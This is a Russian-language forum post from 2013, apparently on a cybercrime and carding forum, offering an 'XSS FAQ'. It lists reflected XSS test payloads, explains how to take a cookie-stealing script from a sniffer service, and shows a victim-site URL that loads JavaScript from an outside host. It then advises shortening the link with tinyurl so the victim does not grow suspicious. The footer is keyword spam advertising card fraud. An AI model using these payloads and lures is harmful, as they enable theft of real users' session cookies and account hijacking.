If you have any questions, contact us:
Telegram:maintex
ICQ:1607000

  #1 Old 08-25-2013, 10:38 AM
Cartographer
 
Cartographer's Avatar
 
Join Date: Aug 2013
Posts: 511
Cartographer is on a distinguished road
Default Xss - faq

Привет всем я хотел сделать небольшой FAQ по xss ну что начнем

1.Что такое XSS ?

Code:
XSS - Cross Ste Scripting (CSS уже занято Cascade Style Sheets). Уязвимость, возникающая вследствии недостаточной фильтрации вводимых пользователями и в дальнейшем отображаемых на страницах сайта данных. Позволяет разместить непосредственно на страницах сайта произвольный html-код (соответственно, код будет выполняться у всех пользователей, зашедших на страницу).
2.Проверка на уязвимость :
В поиске напишите <fuck> и в исходники поищите слово fuck если "<>" остались это значит то что сайт уязвим если они заменились на что то типа такого :

Code:
&lt;fuck&gt;
то это значит искать xss без полезно но если "<>" остались то можете с улыбкой вбивать ваш скрипт я тут написал чуть-чуть :

Code:
<script>alert()</script> 
"><script>alert()</script> 
'><''>"><script>alert(/XSS/)</script> 
<script>alert('xss')</script> <script>alert('A');</script> 
"><sсriрt>alert(document .cookie)</sсriрt>
Написали ? вышло окно? если да то переходим к 3 шагу.

3.Эксплуатирование XSS :
Эксплуатировать xss вы можете с любого сниффера например https://hacker-pro.net/sniffer/ заходим на сниффер нам нужно будет взять оттуда скрипт для кражи cookies


Взяли скрипт ? он может выглядит вот так :

Code:
%3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js></SCRIPT>"
этoт скрипт взят со сниффера hacker-pro.net
например у нас получилась такая ссылка

Code:
http://site.ru/news="><script>alert('xss')</script>
нам надо вставить скрипт для пассивной xss атаки после знака "> и если сайт оставляет куки то куки придут на ваш сниффер вставили? и у нас получится вот такая ссылка

Code:
http://site.ru/news=">%3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js></SCRIPT>"
теперь переходим к следующему пункту

4.Шифрование длинных ссылок :

Согласитесь если такую ссылку дать жертве то она заподозрит что тo и мы должны сделать её короткой мы можем зашифровать её с помощью сервиса http://tinyurl.com/ и отправлять жертве и если она перейдет по ссылке то на наш сниффер придут её куки конечно же если сайт оставляет куки) ну что на всё. (c) TICKHACK
Cartographer is offline   Reply With Quote
Reply

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
XSS 101 Cartographer Tutorials 0 08-31-2013 05:53 PM
Bypassing SQLiRFILFI and XSS filters Cartographer Tutorials 0 08-31-2013 05:51 PM
Предназначение XSS атак Cartographer Статьи 0 08-22-2013 09:52 PM


Cybercrime forum, cybercrime site, ,fraud forum, russian fraud forum, Credit cards, carder, infraud, carders.ws, crdpro, fraudsters, darkpro, crdcrew, dumps, cvv, cc, stuff carding, legit seller, vendor, free cvv, dumps+pin, skimmer, ,shimmer, emv software, emv chip writer, free cc+cvv, valid cards, track 2, free cvv, dump pin, dumps, cvv, cc, credit cards, real carding, legit vendor, carder forum, carding tutorial, russian hackers, online cvv shop, track 101, enroll, fullz